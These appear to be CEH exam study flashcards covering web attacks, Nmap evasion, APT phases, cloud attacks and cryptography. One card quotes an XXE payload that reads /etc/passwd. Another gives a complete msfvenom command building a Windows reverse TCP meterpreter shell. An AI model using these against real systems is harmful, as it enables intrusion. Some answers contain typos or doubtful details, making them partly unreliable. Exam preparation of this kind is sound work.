ceh Flashcards
(225 cards)
Which web vulnerability would an attacker be attempting to exploit if they delivered the following input: <!DOCTYPE blah [ < !ENTITY trustme SYSTEM “file:///etc/passwd” > ] > *
XXE
Which Nmap switch helps evade IDS or firewalls?*
-D
Which type of SQL injection attack extends the results returned by the original query, enabling attackers to run two or more statements if they have the same structure as the original one?*
Union SQL injection
Emily posts a large amount of private info, photos, and location tags of recently visited places. James targets Emily and her acquaintances to conduct a location search to detect their geolocating by using an automated tool and gathering information to perform other sophisticated attacks. What is the tool employed by James in the above scenario?*
Hootsuite
Abel, cloud architect, uses container tech to deploy applications/software, including all its dependencies, such as libraries and config files, binaries, and other resources that run independently from other processes in the cloud environment. For the containerization of applications, he follows the five-tier container technology architecture. Currently, Abel is verifying and validating image contents, singing images, and sending them to the registries. Which tier of the container tech architecture is Abel currently working in? *
Tier-2: Testing and accreditation systems
During the enumeration phase, Lawrence performs banner grabbing to obtain info such as OS details and versions of services running. The service that he enumerated runs directly on TCP port 445. Which service is enumerated by Lawrence in this scenario?*
Server Message Block (SMB)
What is the correct way of using MSF venom to generate a reverse TCP shellcode for Windows?*
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
Keatron performed a vulnerability scan on a target organization by sniffing the traffic on the network to identify the active systems, network services, applications, and vulnerabilities. He also obtained the list of the users who are currently accessing the network. What type of vulnerability assessment did Keaton perform on the target organization?*
Passive assessment
Bobby targets the infrastructure of an org. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection. What APT lifecycle phase is currently executing?*
Initial intrusion
At what stage of the cyber kill chain theory model does data exfiltration occur?*
Actions on objectives
Bella/Jason finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and passwords are shared in plaintext4, allowing hackers to perform successful session hijacking. To address this situation, Jason implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by Jason?*
FTPS
This wireless security protocol allows 192-bit minimum-strength security protocols and cryptographic tools to protect sensitive data, such as GCMP-256, HMAC-SHA384, and ECDSA using a 384-bit elliptic curve. Which is this wireless security protocol?*
WPA3-Enterprise
What is the file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application?*
AndroidManifest.xml
You have been authorized to perform a penetration test against a website. You want to use Google dorks to footprint the site but only want results that show file extensions. What Google dork operator would you use?*
file type
Alice targeted an organization’s cloud services. She infiltrated the target’s MSP provider by sending spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored them in the MSP. Then, she used this information to launch further attacks on the target organization. Which cloud attack did Alice perform in the above scenario?*
Cloud hopper attack
Susan wants her web API to update other applications with the latest information. She uses a user-defined HTTP callback or push APIs that are raised based on trigger events; when invoked, this feature supplies data to other applications so that users can instantly receive real-time information. Which technique is employed by Susan?*
Webhooks
In this from of encryption algorithm every individual block contains 64-bit data, and three keys are used, where each key consists of 56 bits. Which is this encryption algorithm?*
Triple Data Encryption Standard
An attacker redirects the victim to malicious websites by sending them a malicious link by email. The link appears authentic but redirects the victim to a malicious web page, which allows the attacker to steal the victim’s data. What type of attack is this?*
Phishing
Richard targets an MNC. He uses a footprinting technique to gather as much information as possible. He gathers domain info such as the target domain name, contact details of its owner, expiry date, and creation date. With the info, he creates a map of the organization’s network and misleads domain owners with social engineering to obtain internal details of its network. What type of footprinting technique is employed?*
Whois footprinting
Robin targeted an organizations’ network to sniff all the traffic. During the process he plugged in a rogue switch to an unused port in the LAN with a priority lower than any other switch in the network so that he could make it a root bridge that will later allow him to sniff all the traffic in the network. What is the attack performed by Robin in the above scenario?*
STP attack
Bobby targeted a user and decided to hijack and intercept all their wireless communications. He installed a fake communication tower between two authentic endpoints to mislead the victim. Bobby used the virtual tower to interrupt data transmissions between the user and real tower, attempting to hijack an active session. Upon receiving the user’s request, he manipulated the traffic with the virtual tower and redirected the victim to a malicious web site. What is the attack performed?*
aLTEr attack
Dorian is sending a digitally signed email to Polly. With which key is Dorian signing this message and how is Polly validating it?*
Dorian is signing the message with his private key, and Polly will verify that the message came from Dorian by using Dorian’s public key.
Annie uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks. What is the component of the Docker architecture used?*
Docker daemon
What is the common name for a vulnerability disclosure program opened by companies in platforms such as HackerOne?*
Bug bounty program